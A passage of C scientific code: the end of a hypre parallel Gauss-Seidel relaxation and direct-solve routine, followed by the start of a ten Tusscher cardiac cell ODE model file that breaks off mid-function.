u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If row is of the right type ( C or F ) and diagonal is
* nonzero, relax point row; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[row] == relax_points
&& A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
#ifndef HYPRE_USING_PERSISTENT_COMM
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
#endif
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] += hypre_MPI_Wtime();
#endif
}
break;
case 13: /* hybrid L1 Gauss-Seidel forward solve */
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
v_buf_data[index++]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
tmp_data[i] = u_data[i];
}
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 14: /* hybrid L1 Gauss-Seidel backward solve */
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 19: /* Direct solve: use gaussian elimination */
{
HYPRE_Int n_global = (HYPRE_Int) global_num_rows;
HYPRE_Int first_index = (HYPRE_Int) first_ind;
/*-----------------------------------------------------------------
* Generate CSR matrix from ParCSRMatrix A
*-----------------------------------------------------------------*/
#ifdef HYPRE_NO_GLOBAL_PARTITION
/* all processors are needed for these routines */
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
if (n)
{
#ifndef HYPRE_NO_GLOBAL_PARTITION
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
A_CSR_i = hypre_CSRMatrixI(A_CSR);
A_CSR_j = hypre_CSRMatrixJ(A_CSR);
A_CSR_data = hypre_CSRMatrixData(A_CSR);
f_vector_data = hypre_VectorData(f_vector);
A_mat = hypre_CTAlloc(HYPRE_Real, n_global*n_global, HYPRE_MEMORY_HOST);
b_vec = hypre_CTAlloc(HYPRE_Real, n_global, HYPRE_MEMORY_HOST);
/*---------------------------------------------------------------
* Load CSR matrix into A_mat.
*---------------------------------------------------------------*/
for (i = 0; i < n_global; i++)
{
for (jj = A_CSR_i[i]; jj < A_CSR_i[i+1]; jj++)
{
column = A_CSR_j[jj];
A_mat[i*n_global+column] = A_CSR_data[jj];
}
b_vec[i] = f_vector_data[i];
}
hypre_gselim(A_mat,b_vec,n_global,relax_error);
for (i = 0; i < n; i++)
{
u_data[i] = b_vec[first_index+i];
}
hypre_TFree(A_mat, HYPRE_MEMORY_HOST);
hypre_TFree(b_vec, HYPRE_MEMORY_HOST);
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#ifdef HYPRE_NO_GLOBAL_PARTITION
else
{
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#endif
}
break;
case 98: /* Direct solve: use gaussian elimination & BLAS (with pivoting) */
{
HYPRE_Int n_global = (HYPRE_Int) global_num_rows;
HYPRE_Int first_index = (HYPRE_Int) first_ind;
HYPRE_Int info;
HYPRE_Int one_i = 1;
HYPRE_Int *piv;
/*-----------------------------------------------------------------
* Generate CSR matrix from ParCSRMatrix A
*-----------------------------------------------------------------*/
#ifdef HYPRE_NO_GLOBAL_PARTITION
/* all processors are needed for these routines */
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
if (n)
{
#ifndef HYPRE_NO_GLOBAL_PARTITION
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
A_CSR_i = hypre_CSRMatrixI(A_CSR);
A_CSR_j = hypre_CSRMatrixJ(A_CSR);
A_CSR_data = hypre_CSRMatrixData(A_CSR);
f_vector_data = hypre_VectorData(f_vector);
A_mat = hypre_CTAlloc(HYPRE_Real, n_global*n_global, HYPRE_MEMORY_HOST);
b_vec = hypre_CTAlloc(HYPRE_Real, n_global, HYPRE_MEMORY_HOST);
/*---------------------------------------------------------------
* Load CSR matrix into A_mat.
*---------------------------------------------------------------*/
for (i = 0; i < n_global; i++)
{
for (jj = A_CSR_i[i]; jj < A_CSR_i[i+1]; jj++)
{
/* need col major */
column = A_CSR_j[jj];
A_mat[i + n_global*column] = A_CSR_data[jj];
}
b_vec[i] = f_vector_data[i];
}
piv = hypre_CTAlloc(HYPRE_Int, n_global, HYPRE_MEMORY_HOST);
/* write over A with LU */
hypre_dgetrf(&n_global, &n_global, A_mat, &n_global, piv, &info);
/*now b_vec = inv(A)*b_vec */
hypre_dgetrs("N", &n_global, &one_i, A_mat, &n_global, piv, b_vec, &n_global, &info);
hypre_TFree(piv, HYPRE_MEMORY_HOST);
for (i = 0; i < n; i++)
{
u_data[i] = b_vec[first_index+i];
}
hypre_TFree(A_mat, HYPRE_MEMORY_HOST);
hypre_TFree(b_vec, HYPRE_MEMORY_HOST);
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#ifdef HYPRE_NO_GLOBAL_PARTITION
else
{
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#endif
}
break;
}
return (relax_error);
}
|
tentusscher_epi_2004_S2_2.c | #include <assert.h>
#include <stdlib.h>
#include "tentusscher_epi_2004_S2_2.h"
GET_CELL_MODEL_DATA(init_cell_model_data) {
assert(cell_model);
if(get_initial_v)
cell_model->initial_v = INITIAL_V;
if(get_neq)
cell_model->number_of_ode_equations = NEQ;
}
SET_ODE_INITIAL_CONDITIONS_CPU(set_model_initial_conditions_cpu) {
// Default initial conditions
/*
sv[0] = INITIAL_V; // V; millivolt
sv[1] = 0.f; //M
sv[2] = 0.75; //H
sv[3] = 0.75f; //J
sv[4] = 0.f; //Xr1
sv[5] = 1.f; //Xr2
sv[6] = 0.f; //Xs
sv[7] = 1.f; //S
sv[8] = 0.f; //R
sv[9] = 0.f; //D
sv[10] = 1.f; //F
sv[11] = 1.f; //FCa
sv[12] = 1.f; //G
sv[13] = 0.0002; //Cai
sv[14] = 0.2f; //CaSR
sv[15] = 11.6f; //Nai
sv[16] = 138.3f; //Ki
*/
// Elnaz's steady-state initial conditions
real sv_sst[]={-86.5236591284772,0.00130241284471985,0.778613483022969,0.778472769811598,0.000175875277625194,0.484626058693879,0.00294965177778795,0.999998333317616,1.94791112184908e-08,1.90234417053386e-05,0.999779558473224,1.00713872511970,0.999995965310622,4.41551215458988e-05,0.567040008888733,10.2464162625462,139.303734550690};
for (uint32_t i = 0; i < NEQ; i++)
sv[i] = sv_sst[i];
}
SOLVE_MODEL_ODES_CPU(solve_model_odes_cpu) {
uint32_t sv_id;
int i;
#pragma omp parallel for private(sv_id)
for (i = 0; i < num_cells_to_solve; i++) {
if(cells_to_solve)
sv_id = cells_to_solve[i];
else
sv_id = i;
for (int j = 0; j < num_steps; ++j) {
solve_model_ode_cpu(dt, sv + (sv_id * NEQ), stim_currents[i]);
}
}
}
void solve_model_ode_cpu(real dt, real *sv, real stim_current) {
assert(sv);
real rY[NEQ], rDY[NEQ];
for(int i = 0; i < NEQ; i++)
rY[i] = sv[i];
RHS_cpu(rY, rDY, stim_current, dt);
for(int i = 0; i < NEQ; i++)
sv[i] = rDY[i];
}
void RHS_cpu(const real *sv, real *rDY_, real stim_current, real dt) {
// State variables
real svolt = sv[0];
real sm = sv[1];
real sh = sv[2];
real sj = sv[3];
real sxr1 = sv[4];
real sxr2 = sv[5];
real sxs = sv[6];
real ss = sv[7];
real sr = sv[8];
real sd = sv[9];
real sf = sv[10];
real sfca = sv[11];
real sg = sv[12];
real Cai = sv[13];
